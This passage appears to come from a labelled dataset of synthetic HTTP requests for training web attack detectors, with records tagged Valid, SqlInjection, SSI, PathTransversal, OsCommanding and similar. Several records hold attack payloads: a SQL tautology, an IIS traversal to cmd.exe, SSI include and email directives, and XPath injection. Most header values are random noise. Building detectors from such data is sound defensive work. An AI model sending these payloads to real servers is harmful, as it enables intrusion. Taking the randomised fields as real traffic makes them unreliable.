TE: deflate,deflate;q=0.7,trailers
Trailer: TE
User-Agent: tkNc4Y-6J http://www.03n1ofec.de
UA-CPU: x86
UA-Disp: 626,6964,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 370x5547
Via: 7.3 www.sstsa3ap.htm, 7.2 www.2migutao.png
Transfer-Encoding: gzip
Upgrade: 8oArj/0.3, elhh/1.2, 9oUsf/7.4, bib/0.3
Warning: 228 www.oikad9p.html "n7asOt" 
X-Forwarded-For: 27.223.128.62
X-Serial-Number: 9975716182184282861
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27822
Start - Id: 13493
class: Valid
GET /l@MOvE1S7XZ_mrj/iMZEkv/flBsjtdzOtsa470a1r/Aahrejsoi9rffTwoFe3e/hq.7VreoBBWuY2/os4cen/VVGHxZh/p8jillmy3aabmcu0e/nSnnNde/QA1_E-PjHlinkyBcv.pl?tPyHdsrtag=udAlikeserY&5isrnoag=nras&wM@NeM=o%3Bw%2Beaie%27o%7Eft3nelpd&nneRMioXhpath=659 HTTP/1.0
Host: www.EpscphmdE.it
Connection: Eegmnl
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: identity;q=0.5, identity, identity, identity;q=0.2, compress
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 115.218.99.104
Cookie: sa7rde=d6ueN;ck03mitse=aG;ghmr8=80;9zjK_HUstdin48.=hrzh3eraaccess_logEgcopyvary
Cookie2: $Version="3"
Date: Tue, 10 Jul 07 05:17:14 GMT
ETag: "OHtM-9dIFcY2vcG"
Expect: 100-continue
From: netoed@RhSevedeen.ch
If-Modified-Since: Thu, 21 Jan 10 11:15:34 UTC
If-Unmodified-Since: Mon, 19 Jan 04 18:30:55 UTC
If-Match: *
If-None-Match: "F0MDFqOPE03lnI4DR11"
If-Range: "5B1MiVkXba-txEzCjiAS"
Max-Forwards: 25
MIME-Version: 0.3
Pragma: gAcs='evi'
Proxy-Authorization: Basic Mm9qdDpUc2Vkam5l
Authorization: heja dqamer=tdaledtt
Range: -36203
Referer: http://www.lyrU.st/Eiae/ieh3/fsccw/8raaasyL.png
TE: deflate;q=0.2,deflate;q=0.5,trailers
Trailer: Expect
User-Agent: Mozilla/9.9 (Machintosh; U; Mac OS X 9.5; Aq-de; rv:2.7.5) Gecko/53795234
UA-CPU: x86
UA-Disp: 908,0638,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 912x6854
Via: HTTP/3.4 www.Bogfoe.jpg, HTTP/5.2 165.168.73.48:3, gea/8.2 185.6.28.11
Transfer-Encoding: deflate
Upgrade: sldtn/3.8
Warning: 010 103.159.234.205 "gl6ayodfhturh" "Fri, 18 Jul 08 24:07:19 CET"
X-Forwarded-For: 102.230.110.42
X-Serial-Number: 44417038819
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13493
Start - Id: 11278
class: Valid
GET /awjkY/xlinkB7s/efCM_6nEQmnEEgZRZh2G/r2Oe6re/SscriptV7U/kJ-BH1Pv0htSdT/rKmajsrethoe9.swf? HTTP/1.1
Host: www.dLdldt4Eti.ch
Connection: close
Accept: */*
Accept-Charset: windows-1258;q=0.1, euc-jp, euc-kr, us-ascii, koi8-r
Accept-Encoding: *;q=0.0
Accept-Language: efvTou-xtt7wn, cdpena-e7tynoa;q=0.8, hk-dge;q=0.1, RmjTtr7l-odr2tes;q=0.1, 0m-teee;q=0.9
Cache-Control: l='6o4'
Client-ip: 153.188.24.187
Cookie: 8eq=uitt7 eopenp-El[eu;Qyrsystemt5Zlike=nqsgw;netasyaphtrrb=oom 
Cookie2: $Version="68"
Date: Sun, 30 Jul 06 11:55:40 GMT
ETag: W/"uoIVWXXQSMhG4xL"
Expect: 100-continue
From: 7urSh@tin1aU.biz
If-Modified-Since: Mon, 10 Nov 08 18:24:47 CET
If-Unmodified-Since: Tue, 18 Mar 08 24:06:54 UTC
If-Match: "Hl3Cy_Uylo.i-HqPL48"
If-None-Match: *
If-Range: Wed, 04 Jul 07 23:59:33 GMT
Max-Forwards: 5003
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: tereez ersesE9=gFyrh
Authorization: Digest realm
Range: 7836-892
Referer: http://tmna.cz/oohmo1ui/ea9ie/e9ihnt.asmx
TE: deflate,trailers,chunked
Trailer: Accept-Encoding
User-Agent: Mozilla/8.5 (Windows; U; Windows NT 7.2; rE-di; rv:7.1.3) Gecko/00663735
UA-CPU: PowerPC
UA-Disp: 2659,0505,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 4159x0330
Via: HTTP/2.9 www.5Qte.js
Transfer-Encoding: CctI; 19wi=rao6aega
Upgrade: cteee/6.3, jE5s/8.7, saWaMe/0.5
Warning: 337 216.50.53.199 "osavyeiduatyteha" "Tue, 27 Apr 04 05:08:34 GMT"
X-Forwarded-For: 161.180.94.113
X-Serial-Number: 7492268797432274
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11278
Start - Id: 15427
class: Valid
GET /foJ/PPg0zh/5zs/cloP6mislwma/znnndbcow/iD3lGWRTR25-@m/nj/lmdoESfrfrkrt/oXtcfP.bin?olespts=NoDelaRn&gvreot=0843985 HTTP/1.1
Host: www.tbOa.uk:80
Connection: close
Accept: */*
Accept-Charset: windows-874, windows-1252, euc-tw;q=0.5, x-mac-cyrillic, iso-8859-5;q=0.1
Accept-Encoding: *
Accept-Language: tE-tensteet, sR-eufnUgeg, o6iayrHe-h;q=0.0
Cache-Control: only-if-cached
Client-ip: 104.12.11.229
Cookie: y9n1it86soue=e9_;sfemoebefqnjt=5805640178;flz=paP&mRTri;3rofr=se9wjrusa0a7tdlt;GiEoTuvyO4=%ue9nh@deT
Cookie2: $Version="494"
Date: Wed, 19 Aug 09 06:45:20 GMT
ETag: "2l.48YiwXcr_reAeJH5@"
Expect: o00to=jrir5a;telilZd
From: hreEo@mhtthLrava.org
If-Modified-Since: Thu, 25 Dec 08 22:52:41 UTC
If-Unmodified-Since: Tue, 12 Aug 08 08:12:25 CET
If-Match: ".xT4_p8NFyab_Ywg@zA1"
If-None-Match: *
If-Range: "Hp34MJCy@SdKFCTx"
Max-Forwards: 357
MIME-Version: 1.7
Pragma: no-cache
Proxy-Authorization: Digest response="70C8dc020EB2a7c525866dCFfF9dFf75"
Authorization: NTLM YWl5dHJFb2J0OWVUc2lhYXJldG9xOU9lZ1RlaGU2b1NvdG5lcWF0ZQ==
Range: -590219
Referer: /s1if/ldnao7tU/dlbsf/oeexLc/iH0ao1V.asp
TE: trailers,trailers
Trailer: If-Match
User-Agent: uefDtra2rl (cugPR4)
UA-CPU: x86
UA-Disp: 842,1582,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 8272x2964
Via: eeOe/6.6 www.aTou3.htm
Transfer-Encoding: deflate
Upgrade: ncaer/8.0, rbkq/6.1, eos/1.0, ckiws/1.2, 6ln76s/2.0
Warning: 680 177.253.57.76 "nFrmsteeL" 
X-Forwarded-For: 42.110.19.254
X-Serial-Number: 39984
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15427
Start - Id: 42604
class: SqlInjection
GET /rjfshleGtaun/syEdVSBqfT/dawinnt66updateG4gCn/tde28ax6aseoysunuwu/wVxe9IL2/tX/huOCiODTLP9-DZ0gVHq.jpeg?Scsej7t=41240072&nSiwabFx0HOmiqt=ltwr&Oul2utilwAtsf=Ex&rlmthto=cdHRo1WdH&inru=eg%26eN&eeSe2hn3hotdynl=ee&a3deEansh=%2BN%40e&mrt=%27+++OR++++%27rosu%27+%3D++%27++&dkep=hm%401QMLKdD HTTP/1.1
Host: 166.16.14.67
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: iso-2022-jp;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 8.13.145.39
Cookie: wt29fi6mOt9leel=tYlVR;xasnx=7
Cookie2: $Version="62"
Date: Tue, 18 Jul 06 10:17:50 CET
ETag: W/"dDx574vQD5EHg8r83RQ"
Expect: r9g3sbl=nvita
From: ioed@oROvlcftKp.biz
If-Modified-Since: Sun, 20 Dec 09 18:02:03 CET
If-Unmodified-Since: Mon, 29 Oct 07 18:54:04 GMT
If-Match: "WEA1.aPi5VU1ENnWex"
If-None-Match: *
If-Range: Wed, 11 Mar 09 15:51:11 CET
Max-Forwards: 9258
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5-sess
Authorization: Basic YnB0bmUwbzpzU2Vydw==
Referer: /otcds.msf
TE: trailers,gzip;q=0.2,deflate;q=0.8
Trailer: Warning
User-Agent: jV7mQdJi_ http://www.zdyq.uk
UA-CPU: Sparc
UA-Disp: 4133,8176,16
UA-OS: Windows 98
UA-Pixels: 4720x346
Via: HTTP/1.3 185.219.3.188
Transfer-Encoding: identity
Warning: 966 www.behrc.jpeg "tmzezat" "Sat, 08 Apr 06 03:40:35 CET"
X-Forwarded-For: 32.163.55.249
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42604
Start - Id: 36870
class: LdapInjection
GET /XgPreplace4Uh.BYDU/4ettGJFi/rW2qtd/gt803.css?lhntoGohtini=sve5Eas6se%40o6p&rhome4Tbody46v1mcr=3p1uW%40&oge0tieer6T2h=onfa&tTiEe1isa=nhuanewot&uelh5ps=y--mmK&A9hkWe6foptT2=0987792 HTTP/1.1
Host: 34.53.193.36
Connection: close
Accept: video/quicktime;q=0.4
Accept-Charset: iso-10646-ucs-2;q=0.2, x-mac-hebrew;q=0.1, iso-8859-8-i
Accept-Encoding: jSoio)(   |   (8ts2=*)
Accept-Language: *;q=0.6
Cache-Control: qm2vm6o=n
Client-ip: 163.227.197.120
Cookie2: $Version="9"
Date: Tue, 11 Oct 05 02:58:39 GMT
Expect: 100-continue
If-Modified-Since: Wed, 29 Sep 04 01:39:09 UTC
If-Range: "phkvgShB5cYJ9wMgw3"
Max-Forwards: 77
Pragma: Hnic=ip0q4ial
Proxy-Authorization: NTLM anNub2hpdG91ckFjYXNzbnJlVUxNZWlwbWNoZW5ldGl6eEY3b2U=
Authorization: Digest nc=02e31F87
Referer: http://we3n.gov/ocuhn2eT/nsSttibe/eTce/sesi0yn/ttaouha.bin
User-Agent: Mozilla/4.7 (Machintosh; U; Mac OS X 8.0; Eo-m9; rv:1.9.2) Gecko/35791910
Via: 7.5 www.c2Rlje.htm
Transfer-Encoding: identity
X-Serial-Number: 06647401457

null

End - Id: 36870
Start - Id: 21169
class: Valid
GET /sdttALeQvsiRia/dt2rtogaro/s69sd4tRocgw/eRiI.shtml?6dEnsdarmdf=792585&tissIvzht=imQTCLc2.&tiEsy=liH8dg HTTP/1.1
Host: 163.164.104.104
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: gzip;q=0.6
Accept-Language: m5t-sE;q=0.9, Cmka7r-1eoeetU, oHai1-gowr, nt-h8lXbrl;q=0.6
Cache-Control: max-age=5
Client-ip: 255.8.84.163
Cookie: ikisnndcsha=ixwheremtmfnentautoexecvo9g']logi;JgMTgkG_RTftp=i@9;5adminPF4-GzdeleteDN=chH
Cookie2: $Version="71"
Date: Sat, 22 May 04 15:04:16 UTC
ETag: W/"HyDAkkNEsSuJ@7Ia9Dm"
Expect: 100-continue
From: aetfaus@nbciblTus.fr
If-Modified-Since: Sun, 28 Nov 04 13:28:14 GMT
If-Unmodified-Since: Sun, 21 May 06 16:44:52 CET
If-Match: *
If-None-Match: "8NmfRIjR4OqjPHZ@n"
If-Range: Thu, 08 Oct 09 09:25:07 CET
Max-Forwards: 55
MIME-Version: 5.4
Pragma: e=EhEeg
Proxy-Authorization: Digest cnonce="sSwzouba"
Authorization: Digest algorithm=s3boRw2
Range: -903,-0957,294070-
Referer: http://Oalg.be/mrbaa.jpeg
TE: deflate;q=0.9
Trailer: Connection
User-Agent: Mozilla/4.3 (Windows; U; WinNT 4.5; is-Rt; rv:2.6.2) Gecko/05987648
UA-CPU: PowerPC
UA-Disp: 1305,9206,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 402x543
Via: HTTP/6.1 www.jbao.jpg, ied/3.1 www.yelmw.tiff
Transfer-Encoding: deflate
Upgrade: aoN/9.8
Warning: 554 www.g0den7.shtml "imsucel" "Thu, 03 May 07 11:10:04 CET"
X-Forwarded-For: 217.168.22.89
X-Serial-Number: 041648335
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21169
Start - Id: 39334
class: SSI
GET /ret/vQaAH/hEGS8O3ZDSvO_hC0OD/fwtTO/tTb8bRo/crP/aOwAB2wqIHqSwLKSypM/edh6eul/nqp/deFxwo7PJzAZzj.php4?MAedlahtst=%3C%21--%23email+fromhost%3D%22www.isyoean.com%22+tohost%3D%22mailbox.g2tu.com%22+message%3D%22ReWt4n+dzeecb+ao+ednasi%22+fromaddress%3D%22Eodsti.com%22+toaddress%3D%22ebt.omdeMw.com%22+subject%3D%22s%22+sender%3D%22qc.com%22+replyto%3D%22cnBowmr.com%22+cc%3D%22alo%22+inreplyto%3D%22sr8+4rdi+pe7ene%22+id%3D%228gaedmail%22+--%3E&t4D=8&8niguth=obtfds4id0e&t9ieareolmsu=768998854&swlt2stgne67yre=gAhew&El4-tqn4vO=102827164&haem=envkdyW44En HTTP/1.0
Host: www.lbdeteooht.fr:80
Connection: keep-alive
Accept: audio/*
Accept-Charset: *
Accept-Encoding: identity, compress
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 153.213.53.71
Cookie: m7doaaMwine01a=758373;Hu7qbJ=3node
Cookie2: $Version="998"
Date: Tue, 07 Aug 07 06:04:04 CET
ETag: W/"UfE2ce@UXAHx12IVp"
Expect: 100-continue
From: fiaotu@eNeFi.it
If-Modified-Since: Fri, 11 Sep 09 07:01:35 CET
If-Unmodified-Since: Wed, 02 Sep 09 11:15:43 UTC
If-Match: "7EHT5aqp_Ma3GG_VDrdm"
If-None-Match: *
If-Range: Sat, 29 May 04 03:58:58 UTC
Max-Forwards: 7357
MIME-Version: 5.7
Pragma: Ttsgkra=xl4i
Proxy-Authorization: NTLM dDF5cXlCY2FlcnMwZ3RveXJlbHQ4b0Vhc1R5cmhvaGFvaGU4c2Q=
Authorization: Digest qop=auth-int
Range: 422767-,0924-,61697-47592
Referer: http://asoE5da.fr/hTns.mdb
TE: deflate;q=0.1,gzip,chunked
Trailer: From
User-Agent: Mozilla/7.7 (Machintosh; U; PPC Mac OS X 7.8; po-nT; rv:9.2.5) Gecko/14844324
UA-CPU: Sparc
UA-Disp: 607,126,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 9132x248
Via: HTTP/0.3 www.rrmun.jpg, FTP/2.6 28.180.165.15, FTP/0.1 www.ztfIloH.html
Transfer-Encoding: compress
Upgrade: 5lnxa/4.9, sonsya/6.3
Warning: 603 www.gfjcoE2.gif "tntsi" "Thu, 02 Nov 06 09:59:58 UTC"
X-Forwarded-For: 135.206.207.129
X-Serial-Number: 802337450581
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 39334
Start - Id: 7902
class: Valid
POST /vTBF/sDmK/oetnsahasbnednrMpoei/KO3Ccmdmh3fKay7.9/yar0agsoincurrerYe/sJVKSWlK@Mtr-z9r/972eoitntdtls/ixjKFgJr/o-T1.RsgV2l3.-cIa8S/dd4p1sfLC/fPu5CMMcaC_EaiqjXa/uotemdO.php4? HTTP/1.0
Content-Length: 33
Content-Language: b
Content-Encoding: deflate
Content-Location: /zyiaviiv/r4idoo/Obfaou.sh
Content-MD5: NHBhb3dlYnNpZG0yYkVvNA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 08 Apr 09 16:07:58 CET
Last-Modified: Sat, 29 Nov 08 18:22:10 CET
Host: 1.79.124.79
Connection: close
Accept: application/*, application/x-tar;q=0.8
Accept-Charset: *
Accept-Encoding: *
Accept-Language: Etntt-anyaCso;q=0.9, ata-pl1mbr;q=0.2, n-8atp, rti-6uadcypt, wlkO8e6-i4oNu
Cache-Control: no-cache
Client-ip: 194.50.167.30
Cookie: fE8h=4
Cookie2: $Version="517"
Date: Sat, 30 Aug 08 06:10:05 CET
ETag: "li@ZzeqO08ih_0Dh"
Expect: eqinoots=Re6h;nn1bxghe
From: l4eni@eruttntIgw.be
If-Modified-Since: Tue, 12 Oct 04 16:19:31 CET
If-Unmodified-Since: Wed, 27 Feb 08 06:13:25 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 09 Sep 05 14:30:40 CET
Max-Forwards: 102
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: NTLM MmJ1c2VQc29jYTQzQmFtTW1mQTNwc2l0bmF0bnRta2V1ZVJuZFN6ZWl3Zmhi
Authorization: Digest realm
Range: 53-7,1-,223-
Referer: http://mimaii.fr/tiNxM/gHEjHt.png
TE: deflate;q=0.5,trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/6.9 (compatible; wix4zlQoI; WinNT; ro3ti; xeielgR)
UA-CPU: PowerPC
UA-Disp: 9422,2675,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 795x581
Via: 1.5 168.15.236.4:3178
Transfer-Encoding: nsw8r
Upgrade: Jva/3.2, d3wi/9.9, tra9r/7.8
Warning: 888 211.74.193.32 "DiEveosmIeusdpsPryeh" 
X-Forwarded-For: 179.151.107.237
X-Serial-Number: 534170749
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cTupdateayq4A2sdtelnet=0OaYtaderw

End - Id: 7902
Start - Id: 44775
class: PathTransversal
GET /dGDuRIwBI6dbYaJZD/ZuorW4S2/ekLmPafq.AB-oOk1E3G1/lTUU6-YZy/fVpWaw0v_tDpMt_A80UX/D3th2OdmSYt_NOy/XRk_yWJRnodejVLV.png?olt=Bto&ano=iaiEm%3AnAae%3Fjszn&dioehtdo5Oh=531541&Ssas=saQEH6rsl&rasi=doc%28+file%3A%2F%2F%2Fc%3A%2Ftt9e4%2Fidehh4e.xml+++%29&aclsrnsRiqu0ero=4DuIPitf&1hesuhtetrp=75&smN3jisarm5=h19tt5fwrberg&podr=tpdetxscript3window.opena&zphhwaoog=loeRap069eisja&dIinYnMui=p&ff5mI=npcweciceaeJi&yt8efyoudah=deleteile%40 HTTP/1.0
Host: www.cfteil.com
Connection: close
Accept: */*;q=0.5
Accept-Charset: x-mac-hebrew, windows-874
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: max-age=17942
Client-ip: 7.176.110.139
Cookie: nmc==E7;ntid2zdn7ds=nqienw2fPetd7abhw;lnltpenhW1rho=ehihehncld
Cookie2: $Version="7"
Date: Sun, 22 Oct 06 10:09:18 UTC
ETag: W/"1moiL3zP1yW7wCq50"
Expect: 100-continue
From: iddCt@3ahi.gov
If-Modified-Since: Tue, 11 Jan 05 06:40:28 GMT
If-Unmodified-Since: Sat, 09 Apr 05 10:30:57 GMT
If-Match: "fp6Z_ZBx9qsx@aE4cZ"
If-None-Match: *
If-Range: "bnHgV_xFALk0xh2v-9j"
Max-Forwards: 816
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Digest nonce
Range: 6578-336232,-258470,45228-5909
Referer: http://Snyeres.uk/ntcs.mdb
TE: trailers,deflate
Trailer: Authorization
User-Agent: Mozilla/7.8 (Windows; U; WinNT 0.9; ei-0O; rv:6.6.3) Gecko/00470632
UA-CPU: Sparc
UA-Disp: 3445,5667,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 822x152
Via: tles/3.0 www.m5eaao.tiff:5
Transfer-Encoding: gzip
Upgrade: xdn/6.9, zath/4.3, enftae/3.8, tsot/2.4
Warning: 651 www.ohli.jpeg "ze4iSksESreE" 
X-Forwarded-For: 39.131.202.145
X-Serial-Number: 2157159271334
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44775
Start - Id: 43913
class: OsCommanding
GET /IISADMPWD/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/%2e%2e%2f%2e%2e/winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.OtFor.fr
Connection: oonsn
Accept: */*
Accept-Charset: iso-2022-kr
Accept-Encoding: *
Accept-Language: I-Morthh
Cache-Control: no-store
Client-ip: 134.255.20.254
Cookie: lzxi79Lu=systemdene( ;oe;ov4CystyleVul=22
Cookie2: $Version="44"
Date: Sun, 01 Mar 09 13:51:55 GMT
ETag: "m.Xsix2eYp_WcagM1-r"
Expect: slnliT
From: nehsxlsR@ou1hri.fr
If-Modified-Since: Mon, 30 Jun 08 24:48:55 GMT
If-Unmodified-Since: Mon, 12 Nov 07 07:32:09 CET
If-Match: *
If-None-Match: "s_elzsq_CrI0TpYbO"
If-Range: Fri, 18 Sep 09 03:00:29 GMT
Max-Forwards: 58
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Basic dEFlNm1kMDpoZE9k
Authorization: Basic dHRsYXM6bDJyZHJlY0w=
Range: 6652-,-36477,66590-93
Referer: http://ietceu.st/oUyed/slelhv/Arrqkl.swf
TE: trailers,chunked;q=0.3
Trailer: Accept-Language
User-Agent: IjUis3 (wLBtxdhQ; cLP-A1Y89; eYeZjhR)
UA-CPU: StrongARM
UA-Disp: 527,703,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 349x5070
Via: HTTP/4.0 50.133.50.36
Transfer-Encoding: etezui; fnoc37q=d0dac
Upgrade: ezwy/1.5, eqeld/8.1, sddee/2.4, yghane/1.4
Warning: 501 123.151.211.66 "eDet3" 
X-Forwarded-For: 206.43.118.58
X-Serial-Number: 83787585359566262
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43913
Start - Id: 40365
class: SSI
GET /N@W.G@1bgW2/gcG20Wx_2aveJwCMPj/v8wuYAmYtK9OtfRqSCA/nl40unsGAN8RLq/oy2eaEpeCdqIiolEi/eETzmlAFraew8or/2Owwsddhtia/T@a26g/rCW6agMDfzzs8C36-l_/duGGmnetcatadminncqTASW.mspx?1UrIaBiV=7571&sfeerwIeeats=roem2&tAloae=5eos&WMOPxW7MSVM=857860&X@iframeperlQjH=ntselectcvtxJalla0i9dHxlk&Bn1usrLasystem4VC2P=99&2crthioojO=sai&8ildaf6=n%29+i&ee3abts6er0i=2cmisxoa&xMh=AfrBwav%5Ddethac&Iteoiteri=wfJlKm&nniaamNysc73Rng=ejq8Mac7P.m0 HTTP/1.1
Host: 119.211.170.184
Connection: keep-alive
Accept: application/*, text/*, application/postscript;q=0.2
Accept-Charset: *
Accept-Encoding: deflate, compress, deflate, compress
Accept-Language: edF-o;q=0.8, eyhceo-nosArt
Cache-Control: no-cache
Client-ip: 109.157.138.19
Cookie: fimHezhtrehu=e7h;hopt65UBfzEid=409265;sAa=s69ksGh'osa
Cookie2: $Version="1"
Date: Wed, 13 Jan 10 15:56:03 GMT
Expect: nRhaokrh
If-Modified-Since: Thu, 07 Sep 06 12:27:05 UTC
If-Unmodified-Since: Wed, 24 Mar 04 22:57:59 CET
If-Match: "qNfplCPrTBYdmDL-o8"
If-None-Match: "tYQWUUG8-ZgvhNlg2"
If-Range: "xv5ccaXIX1zi95Ay"
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM MXJtbnVuanhuTXJhMzloZG5haHdzdGUxc2xua3VyVGlzclhuN3c3
Referer: /toiwfxnc.mspx
User-Agent: <!--#include  virtual="d:\windows\autoexec.bat"    -->
UA-Disp: 157,5322,16
UA-OS: FreeBSD
UA-Color: color16
Via: 2.5 152.150.65.51:2833, HTTP/8.0 www.cmra.jpg, 7.7 216.238.174.109:8
----: --------------------------------------------

null

End - Id: 40365
Start - Id: 50048
class: XPathInjection
PUT /vmeta0RvHj.tiff? HTTP/1.0
Content-Length: 15
Content-Language: jfnmoche,wnt2iis
Content-Encoding: gzip
Content-Location: http://yEdhHlih.de/eplyw.nsf
Content-MD5: d2JkQ2FkZXJzNG5lZWhlZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 03 Sep 04 11:46:48 CET
Last-Modified: Sun, 10 Sep 06 09:19:58 GMT
Host: 106.194.74.9:2309
Connection: keep-alive
Accept: */*
Accept-Charset: iso-2022-jp;q=0.2, windows-1250;q=0.9, iso-8859-8-i, iso-8859-9;q=0.5, koi8
Accept-Encoding: deflate, gzip
Accept-Language: sa1rF-i, 78nx-65t9d
Cache-Control: only-if-cached
Client-ip: 156.140.221.238
Cookie: Q9T5wxN=2flv;eYlpd88ny=telnetTaa;1likeexec-BIQ1Un=r0tde'    or    (i < count(5v2nde/child::text()) and    j     <  count(nsi/child::comment())     and k   < count(ox7o/child::*)  )   or   'Vs'  =   '   enaoeu'  or;rieilOs=7898
Cookie2: $Version="33"
Date: Sun, 25 May 08 14:08:03 CET
ETag: W/"AIvtFc_W-7aHz.bg-93"
Expect: ziee=5mom;eeregi=eeeeil
From: rffjOIp@Tenah9e.be
If-Modified-Since: Sun, 10 Aug 08 23:24:54 CET
If-Unmodified-Since: Sun, 03 Sep 06 11:01:11 GMT
If-Match: "CUmkEK2QSG5CN2-za4q6"
If-None-Match: "FYwdNIAp3x0x3T4IPDt6"
If-Range: "1s.mbu-7l6LUYMKB274d"
Max-Forwards: 8338
MIME-Version: 0.4
Pragma: sorofsoe=Vy5iei
Proxy-Authorization: Digest nc=6d2CdE8f
Authorization: osoic priwx=raeye
Range: -59071,-7
Referer: http://rtisde.it/najth7n/mfeo3fi/Idowrmeu/useaniey/srt8i.jsp
TE: deflate;q=0.6
User-Agent: 8ros5548xleqts
UA-CPU: Sparc
UA-OS: Solaris
UA-Color: color8
Via: FTP/6.9 205.192.20.83
Transfer-Encoding: niisl; lmaxo3n=osTZaybd
Upgrade: el5/5.9, toaEci/6.4, n64go3/0.8, nk1/2.4, emi/6.4
Warning: 331 133.140.170.207 "tenopilr" "Fri, 29 Jul 05 19:30:07 GMT"
X-Forwarded-For: 117.220.135.145
X-Serial-Number: 4431106659344342
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

qtnoihsrts=3767

End - Id: 50048
Start - Id: 2508
class: Valid
GET /esdsi.tiff? HTTP/1.1
Host: 140.168.205.116
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: ea-traoaiOd;q=0.6, elalny-netern, icqbaix-yam
Cache-Control: Rctifc7i=s
Client-ip: 91.201.234.175
Cookie: 8crOro3wXmn6nb6=xohhRdlike5sshhsstseuservices8;iBCxKlsLJ=th ;rnsocorGaik=5ialludeleteehhdo;0aNWm2_EIwyL=iTarhtelnett;ei=f;eeilyhitHnaec=teahme
Cookie2: $Version="27"
Date: Thu, 13 Sep 07 16:31:01 GMT
ETag: ".0IQSDbyQeVX9Up"
Expect: 100-continue
From: ikaya@wqonoaepch.fr
If-Modified-Since: Wed, 27 Oct 04 12:37:08 CET
If-Unmodified-Since: Fri, 15 Sep 06 16:59:02 UTC
If-Match: "Yh5cFRIDkfd-fo4YAX"
If-None-Match: *
If-Range: *
Max-Forwards: 4294
MIME-Version: 7.0
Pragma: nOainst='YmieUtY'
Proxy-Authorization: WbSIb lsbuJu=r4rr
Authorization: Basic dXNlZXJ1OmNtaGk0cg==
Range: 32-6,-041504
Referer: http://IfhRsii.be/trnfeiah/ia9eeClI/5lm2i.dll
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/5.8 (compatible; Konqueror/2.0; SunOS sun4u; ttios2t; cEkyq7eh; eI5e)
UA-CPU: x86
UA-Disp: 5722,6200,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 831x8702
Via: FTP/9.5 128.50.155.165, 7.3 www.emhgh.htm
Transfer-Encoding: compress
Upgrade: m50ll/0.0, a5sim/2.2, yic0t3/9.0
Warning: 414 www.v1if.htm "m6ttrA" "Sun, 06 Jun 04 10:23:40 UTC"
X-Forwarded-For: 183.107.89.121
X-Serial-Number: 347745233258688600
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2508
Start - Id: 14377
class: Valid
GET /sd6nq7/hnwy.png?odifzrsewsT=%2Bv6&Bg6-cat4Ok2bnR=xt+tzpasswdhe+at%3Cen%3F&m_@ajO=ew57grenrtde&dledy=v4e1peI&cftdatrWnet=1eliae7ans&Fn3dALhgiX=wnsStxiwaa6o&5voeaahesox5=0520890982&yWobjectFJj=cat6da%3Bl%40%24o%25u&asspn=%27o%406o%26utlocationeval7hreibetween8 HTTP/1.0
Host: 186.133.191.219
Connection: close
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: htq-d;q=0.0
Cache-Control: only-if-cached
Client-ip: 166.239.11.152
Cookie: Ys7oMcd=hnbloand;hesr5xoie=ee;jiNro=oeA8c2osnao;gain=>
Cookie2: $Version="956"
Date: Wed, 07 Jan 09 11:49:56 UTC
ETag: W/"GjGgvGraJvEvMOTxn"
Expect: caxmEymc
From: Esys@smxt.fr
If-Modified-Since: Wed, 19 Aug 09 19:05:33 CET
If-Unmodified-Since: Mon, 20 Aug 07 04:07:37 GMT
If-Match: "uvOPgRi1IUXn87hVwfT"
If-None-Match: *
If-Range: Sat, 31 Jan 09 24:41:19 GMT
Max-Forwards: 176
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: are8Hq iWu7=vneaiwu
